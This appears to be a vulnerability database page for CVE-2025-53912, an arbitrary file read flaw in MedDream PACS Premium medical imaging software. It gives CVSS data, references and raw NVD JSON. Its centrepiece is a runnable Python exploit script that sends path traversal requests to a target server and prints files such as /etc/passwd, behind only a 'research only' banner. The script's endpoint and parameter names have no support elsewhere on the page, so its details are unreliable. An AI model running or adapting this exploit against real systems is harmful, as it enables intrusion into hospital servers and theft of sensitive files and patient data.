CVE-2025-53912

Description

An arbitrary file read vulnerability exists in the encapsulatedDoc functionality of MedDream PACS Premium 7.3.6.870. A specially crafted HTTP request can lead to an arbitrary file read. An attacker can send http request to trigger this vulnerability.

CVSS Details

CVSS Score

9.6

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:meddream:pacs_server:7.3.6.870:*:*:*:premium:*:*:* - VULNERABLE

MedDream PACS Premium 7.3.6.870及之前版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-53912 PoC - MedDream PACS Premium Arbitrary File Read
# Target: MedDream PACS Premium 7.3.6.870
# Vulnerability: Unvalidated file path in encapsulatedDoc functionality

def exploit_file_read(target_url, file_path):
    """
    Exploit arbitrary file read vulnerability in MedDream PACS Premium
    
    Args:
        target_url: Base URL of the vulnerable MedDream server
        file_path: Path to the file to read (e.g., ../../../../etc/passwd)
    
    Returns:
        File contents if successful, None otherwise
    """
    # Construct the malicious request targeting encapsulatedDoc endpoint
    exploit_url = f"{target_url}/pacs/api/encapsulatedDoc"
    
    # Payload with path traversal to read arbitrary files
    params = {
        'documentId': file_path,
        'type': 'application/octet-stream'
    }
    
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Accept': '*/*',
        'Connection': 'close'
    }
    
    try:
        print(f"[*] Sending exploit request to: {exploit_url}")
        print(f"[*] Attempting to read: {file_path}")
        
        response = requests.get(exploit_url, params=params, headers=headers, timeout=30)
        
        if response.status_code == 200:
            print(f"[+] Success! File contents retrieved ({len(response.content)} bytes)")
            return response.content
        else:
            print(f"[-] Failed with status code: {response.status_code}")
            return None
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {str(e)}")
        return None

def main():
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-53912_poc.py <target_url> <file_path>")
        print("Example: python cve-2025-53912_poc.py http://target.com /etc/passwd")
        sys.exit(1)
    
    target_url = sys.argv[1].rstrip('/')
    file_path = sys.argv[2]
    
    result = exploit_file_read(target_url, file_path)
    
    if result:
        print("\n[+] File Contents:")
        print("=" * 60)
        try:
            print(result.decode('utf-8'))
        except:
            print(result)
        print("=" * 60)

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-53912
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-53912
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-53912/
[4] VulDB https://vuldb.com/cve/CVE-2025-53912
[5] https://talosintelligence.com/vulnerability_reports/TALOS-2025-2273
[6] https://www.talosintelligence.com/vulnerability_reports/TALOS-2025-2273

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-53912", "sourceIdentifier": "[email protected]", "published": "2026-01-20T15:16:59.443", "lastModified": "2026-01-29T15:26:24.213", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An arbitrary file read vulnerability exists in the encapsulatedDoc functionality of MedDream PACS Premium 7.3.6.870. A specially crafted HTTP request can lead to an arbitrary file read. An attacker can send http request to trigger this vulnerability."}, {"lang": "es", "value": "Existe una vulnerabilidad de lectura arbitraria de archivos en la funcionalidad encapsulatedDoc de MedDream PACS Premium 7.3.6.870. Una solicitud HTTP especialmente diseñada puede conducir a una lectura arbitraria de archivos. Un atacante puede enviar una solicitud HTTP para activar esta vulnerabilidad."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-73"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:meddream:pacs_server:7.3.6.870:*:*:*:premium:*:*:*", "matchCriteriaId": "0F239E49-18E8-4DE0-B9B8-C220C3BC0C62"}]}]}], "references": [{"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2273", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2025-2273", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Exploit", "Third Party Advisory"]}]}}